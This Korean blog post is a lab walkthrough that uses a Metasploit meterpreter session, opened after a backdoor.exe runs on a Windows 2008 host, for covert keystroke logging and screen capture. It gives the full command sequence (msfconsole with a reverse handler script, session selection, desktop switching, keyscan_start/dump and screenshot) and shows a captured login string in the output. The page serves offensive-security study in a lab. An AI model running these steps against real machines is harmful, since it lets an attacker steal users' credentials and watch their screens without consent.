[실습] 키보드 스니핑과 스크린샷
■ 사용 시스템
- KaliLinux
- Windows 2008
meterpreter의 getdesktop과 키 스니핑에 대해서 테스트해 보자.
관련 명령어들
enumdesktops 접근 가능한 테스크톱과 윈도우 스테이션 전체 목록을 확인
getdesktop 현재 meterpreter 세션으로 작업하고 있는 사용자 시스템의 현재 테스크 톱 확인
setdesktop 현재 meterpreter 세션 테스크톱에서 다른 데스크톱 스테이션으로 변경
keyscan_start 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 시작
keyscan_stop 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 종료
keyscan_dump meterpreter 데스크톱 세션의 키보드 동작을 저장
윈도우 데스크톱(desktop)에 대해서
Session 0
|
+----- WinSta0(Interactive station)
| |
| +----- Default(desktop) 모든 Application과 desktop에서 수행되는 작업들, 로그인시 프로그램 환경
| +----- Disconnect(desktop) 스크린 세이버 잠금과 관련 ,일정 시간 후 잠기는 화면
| +----- Winlogon(desktop) 윈도우 로그인 화면
|
+----- Service-0x0-3e7$(Non-interactive station)
| |
| +----- Default(desktop)
|
+----- Service-0x0-3e4$(Non-interactive station)
| |
| +----- Default(desktop)
|
+----- SAWinSta(Non-interactive station)
|
+----- Default(desktop)
=> 각 desktop은 각각의 키보드 버퍼를 가지고 있다.
(KaliLinux)
① 현재 meterpreter가 Session/Winsta0/Default 설정되었는지 확인
(필요하면 명령어 수행)
(KaliLinux)
# netstat -an | grep :5432
# service postgresql start
# cd /root/bin ; msfconsole -r reverse_resource2.rc
(Windows2008)
바탕화면에 backdoor.exe 파일 실행
(KaliLinux)
exploit(handler) > sessions -l
exploit(handler) > sessions -i 1
meterpreter >
C:\Users\soldesk\Desktop> exit meterpreter > help ..... (중략) ..... Stdapi: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components ..... (중략) .....
meterpreter > enumdesktops 데스크톱 목록 확인 Desktops ========
Session Station Name ------- ------- ---- 1 WinSta0 Default 1 WinSta0 Winlogon
meterpreter > getdesktop Session 1\WinSta0\Default (session 1\W\D) ********************************************************************************* [참고] 만약 Session/WinSta0/Default 가 아닌경우는 다음과 같이 수행한다. meterpreter > getdesktop Session 0\Service-0x0-3e7$\Default meterpreter > setdesktop Session 0\WinSta0\Default ********************************************************************************* meterpreter > keyscan_start 스니핑 시작 Starting the keystroke sniffer... ********************************************************************************* (windows 2008) 웹브라우저를 통해 웹(EX: www.daum.net)에 접속하여 로그인을 한다. http://www.daum.net ID/PASS *********************************************************************************
meterpreter > keyscan_dump Dumping captured keystrokes... www.daum.net <Return> <Return> jang4sctest1234 meterpreter > keyscan_stop Stopping the keystroke sniffer... meterpreter > screenshot 클라이언트 화면 캡처 Screenshot saved to: /root/bin/ryEDqesf.jpeg
/root/bin/ryEDqesf.jpeg 파일을 확인
|
Kali Linux
WINDOW2008
'Learning > └◆Metasploit' 카테고리의 다른 글
| metasploit 13. 메타스플로잇 업데이트(msfupdate CMD) (0) | 2017.01.06 |
|---|---|
| metasploit 12. password the hash(hash dump) (0) | 2017.01.05 |
| metasploit 10. 윈도우 2008 로그 삭제 (0) | 2017.01.05 |
| metasploit 09. meterpreter를 이용한 윈도우즈 시스템 장악 (0) | 2017.01.05 |
